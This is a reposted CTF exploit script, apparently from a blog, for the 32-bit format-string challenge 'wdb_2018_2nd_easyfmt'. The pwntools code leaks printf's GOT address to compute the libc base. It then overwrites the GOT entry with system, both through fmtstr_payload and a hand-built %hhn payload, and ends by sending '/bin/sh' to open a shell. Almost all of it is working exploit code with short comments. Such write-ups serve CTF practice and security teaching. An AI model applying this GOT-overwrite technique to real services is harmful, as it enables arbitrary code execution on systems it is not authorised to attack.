  • wdb_2018_2nd_easyfmt

    exp

    from pwn import *

    context.log_level = 'debug'
    p = process('./wdb_2018_2nd_easyfmt')
    #p = process('./idaidg/linux_server')
    #p = remote('node3.buuoj.cn',29254)
    elf = ELF('./wdb_2018_2nd_easyfmt')
    libc = elf.libc
    #libc = ELF('./libc/libc-2.23x86.so')

    p.recvuntil('Do you know repeater?')

    # Leak step: the buffer is the 6th argument of printf, so the address written
    # at its start (printf's GOT entry, 0x804A014) is dereferenced by '%6$s'.
    p.send(p32(0x804A014) + '%6$s')
    p.recv()
    #sleep(1)
    # 32-bit libc addresses look like 0xf7xxxxxx; little-endian, so '\xf7' is the last byte
    printf = p.recvuntil('\xf7')[-4:]
    printf_addr = u32(printf)
    print 'printf_addr:' + hex(printf_addr)

    libcbase = printf_addr - libc.symbols['printf']

    print "libcbase:" + hex(libcbase)

    #gdb.attach(p)

    system = libcbase + libc.symbols['system']

    print "system:" + hex(system)

    # Split the target value into its four bytes (lowest first)
    a1 = system % (16*16)
    a2 = (system / (16*16)) % (16*16)
    a3 = (system / (16*16*16*16)) % (16*16)
    a4 = (system / (16*16*16*16*16*16)) % (16*16)

    print "a1,a2,a3,a4:" + hex(a1) + ',' + hex(a2) + ',' + hex(a3) + ',' + hex(a4)
    # pwntools builds the write payload for argument index 6
    payload1 = fmtstr_payload(6, {0x804A014: system})

    # Hand-built equivalent of payload1, kept for reference (not the one sent):
    # four addresses, then four byte-sized writes via %hhn, each padded with %c
    payload = p32(0x804A014)
    payload += p32(0x804A014 + 1)
    payload += p32(0x804A014 + 2)
    payload += p32(0x804A014 + 3)
    payload += '%'
    payload += str(a1 - 16)
    payload += 'c%6$hhn'
    payload += '%'
    payload += str((0x100 + a2) - a1)
    payload += 'c%7$hhn'
    payload += '%'
    payload += str((0x100 + a3) - a2)
    payload += 'c%8$hhn'
    payload += '%'
    payload += str((0x100 + a4) - a3)
    payload += 'c%9$hhn'

    sleep(1)

    p.send(payload1)

    sleep(1)
    # printf now resolves to system, so the next input is its argument
    p.send('/bin/sh\x00')

    p.interactive()

    
  • Original article: https://www.cnblogs.com/luoleqi/p/13498183.html
Copyright © 2011-2022 走看看